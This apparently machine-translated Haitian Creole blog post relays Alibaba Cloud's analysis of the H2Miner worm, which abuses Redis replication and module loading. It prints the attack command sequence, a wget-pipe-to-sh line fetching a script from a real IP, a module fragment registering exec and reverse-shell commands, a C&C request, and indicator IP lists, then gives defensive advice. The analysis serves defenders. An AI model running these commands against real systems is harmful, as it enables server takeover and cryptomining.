ProHoster > Blog > Administrasyon an > Yon nouvo epidemi vè H2Miner te dekouvri ki eksplwate Redis RCE

Yon nouvo epidemi vè H2Miner te dekouvri ki eksplwate Redis RCE

Yon jou de sa, youn nan serveurs pwojè mwen an te atake pa yon vè menm jan an. Nan rechèch nan yon repons a kesyon an "ki sa ki te?" Mwen te jwenn yon gwo atik pa Alibaba Cloud Security ekip la. Kòm mwen pa jwenn atik sa a sou Habré, mwen deside tradui l espesyalman pou ou <3

Antre

Dènyèman, ekip sekirite Alibaba Cloud la dekouvri yon epidemi toudenkou nan H2Miner. Kalite vè move sa a sèvi ak mank de otorizasyon oswa modpas fèb pou Redis kòm pòtay nan sistèm ou yo, apre sa li senkronize pwòp modil move li yo ak esklav la atravè senkronizasyon mèt-esklav epi finalman telechaje modil move sa a nan machin ki atake a epi li egzekite move modil. enstriksyon yo.

Nan tan lontan an, atak sou sistèm ou yo te fèt prensipalman lè l sèvi avèk yon metòd ki enplike travay pwograme oswa kle SSH ki te ekri sou machin ou apre atakè a te konekte nan Redis. Erezman, metòd sa a pa ka itilize souvan akòz pwoblèm ak kontwòl pèmisyon oswa akòz diferan vèsyon sistèm. Sepandan, metòd sa a pou chaje yon modil move ka dirèkteman egzekite kòmand atakè a oswa jwenn aksè nan koki a, ki se danjere pou sistèm ou an.

Akòz gwo kantite serveurs Redis ki anime sou entènèt la (prèske 1 milyon), ekip sekirite Alibaba Cloud a, kòm yon rapèl zanmitay, rekòmande pou itilizatè yo pa pataje Redis sou entènèt epi tcheke regilyèman fòs modpas yo epi si yo konpwomèt. seleksyon rapid.

H2Miner

H2Miner se yon botne min pou sistèm ki baze sou Linux ki ka anvayi sistèm ou a nan yon varyete fason, ki gen ladan mank otorizasyon nan Hadoop fil, Docker, ak vilnerabilite Redis ekzekisyon lòd remote (RCE). Yon botne travay pa telechaje scripts move ak malveyan pou min done ou yo, elaji atak la orizontal, epi kenbe kominikasyon lòd ak kontwòl (C&C).

Redis RCE

Pavel Toporkov te pataje konesans sou sijè sa a nan ZeroNights 2018. Apre vèsyon 4.0, Redis sipòte yon karakteristik loading plug-in ki bay itilizatè yo kapasite pou yo chaje pou dosye konpile ak C nan Redis pou egzekite kòmandman Redis espesifik. Fonksyon sa a, byenke itil, gen yon vilnerabilite kote, nan mòd mèt-esklav, dosye yo ka senkronize ak esklav la atravè mòd fullresync. Sa a ka itilize pa yon atakè yo transfere move so dosye. Apre transfè a fini, atakè yo chaje modil la sou egzanp Redis atak la epi egzekite nenpòt kòmand.

Malveyan analiz vè k'ap manje kadav

Dènyèman, ekip sekirite Alibaba Cloud la te dekouvri ke gwosè gwoup minè move H2Miner te ogmante toudenkou dramatikman. Dapre analiz la, pwosesis jeneral la nan ensidan atak se jan sa a:

Yon nouvo epidemi vè H2Miner te dekouvri ki eksplwate Redis RCE

H2Miner itilize RCE Redis pou yon atak konplè. Atakè yo premye atake sèvè Redis san pwoteksyon oswa sèvè ki gen modpas fèb.

Lè sa a, yo sèvi ak lòd la config set dbfilename red2.so pou chanje non fichye a. Apre sa, atakè yo egzekite lòd la slaveof pou mete adrès lame replikasyon mèt-esklav la.

Lè egzanp Redis atake a etabli yon koneksyon mèt-esklav ak move Redis ki posede pa atakè a, atakè a voye modil ki enfekte a lè l sèvi avèk lòd fullresync pou senkronize dosye yo. Lè sa a, dosye a red2.so pral telechaje nan machin nan atake. Lè sa a, atakè yo sèvi ak modil la chaje ./red2.so pou chaje dosye sa a. Modil la ka egzekite kòmandman ki soti nan yon atakè oswa inisye yon koneksyon ranvèse (backdoor) jwenn aksè nan machin nan atake.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

Apre egzekite yon lòd move tankou / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, atakè a pral reset non dosye backup la epi dechaje modil sistèm lan pou netwaye tras yo. Sepandan, dosye a red2.so ap toujou rete sou machin atake a. Itilizatè yo konseye yo peye atansyon sou prezans nan yon dosye sispèk nan katab la nan egzanp Redis yo.

Anplis de sa nan touye kèk pwosesis move pou vòlè resous, atakè a te swiv yon script move pa telechaje ak egzekite dosye binè move pou 142.44.191.122/kinsing. Sa vle di ke non pwosesis la oswa non anyè ki gen kinsing sou lame a ka endike ke machin sa a te enfekte pa viris sa a.

Dapre rezilta yo jeni ranvèse, malveyan an sitou fè fonksyon sa yo:

  • Téléchargement fichiers Et egzekite yo
  • Mining
  • Kenbe kominikasyon C&C ak egzekite kòmand atakè yo

Yon nouvo epidemi vè H2Miner te dekouvri ki eksplwate Redis RCE

Sèvi ak masscan pou eskanè ekstèn pou elaji enfliyans ou. Anplis de sa, adrès IP sèvè C&C a difisil-kode nan pwogram nan, epi lame atak la pral kominike avèk sèvè kominikasyon C&C la lè l sèvi avèk demann HTTP, kote enfòmasyon zonbi (sèvè konpwomèt) yo idantifye nan header HTTP a.

Yon nouvo epidemi vè H2Miner te dekouvri ki eksplwate Redis RCE

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Lòt metòd atak

Yon nouvo epidemi vè H2Miner te dekouvri ki eksplwate Redis RCE

Adrès ak lyen itilize pa vè k'ap manje kadav la

/kinsing

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

s&c

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Ide

Premyèman, Redis pa ta dwe aksesib sou entènèt la epi yo ta dwe pwoteje ak yon modpas solid. Li enpòtan tou pou kliyan yo tcheke ke pa gen okenn dosye red2.so nan anyè Redis la e ke pa gen okenn "kinsing" nan non dosye/pwosesis la sou lame a.

Sous: www.habr.com

Add nouvo kòmantè